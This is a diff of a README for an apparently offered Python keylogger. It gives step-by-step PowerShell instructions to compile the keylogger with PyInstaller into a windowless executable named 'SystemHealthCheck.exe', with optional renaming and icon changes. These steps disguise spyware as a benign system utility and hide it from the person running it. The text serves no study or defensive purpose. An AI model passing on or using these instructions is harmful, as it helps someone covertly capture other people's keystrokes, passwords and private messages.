mdm223/pyhon-keylogger/README.md

 Step 2.
 Put it in a folder

 Step 3.
+Copy the directory of the file

+Step 4.
 Open PowerShell

-Step 4.
-Copy the directory of the file
+Step 5. --IN POWERSHELL-- write: pip install pyinstaller

-Step 5. --IN POWERSHELL-- write: cd (keylogger file directory)
+Step 6. --IN POWERSHELL-- write: cd (keylogger file directory)

-Step 6. --IN POWERSHELL-- write: pyinstaller --onefile --noconsole --clean --icon=default.ico --name "SystemHealthCheck.exe" keylogger.py
+Step 7. --IN POWERSHELL-- write: pyinstaller --onefile --noconsole --clean --icon=default.ico --name "SystemHealthCheck.exe" keylogger.py

-Step 7.
-IN THE KEYLOGGER FOLDER THERE SHOULD APPEAR A A FEW NEW FOLDERS, OPEN THE ONE NAMED "dist" AND COPY THE .EXE file from it

 Step 8.
+IN THE KEYLOGGER FOLDER THERE SHOULD APPEAR A FEW NEW FOLDERS, OPEN THE ONE NAMED "dist" AND COPY THE .EXE file from it

+Step 9.
 THE COPIED .EXE FILE IS READY TO USE

-Step 9.
+Step 10.
 (OPTIONAL) YOU CAN RENAME THE .EXE FILE TO WHATEVER YOU WANT

-Step 10.
+Step 11.
 (OPTIONAL) IF YOU WANT TO CHANGE THE .EXE ICON YOU CAN FOLLOW THIS TUTORIAL (not mine): https://www.youtube.com/watch?v=1jZt6m_SkDs

 ====== THATS ALL ======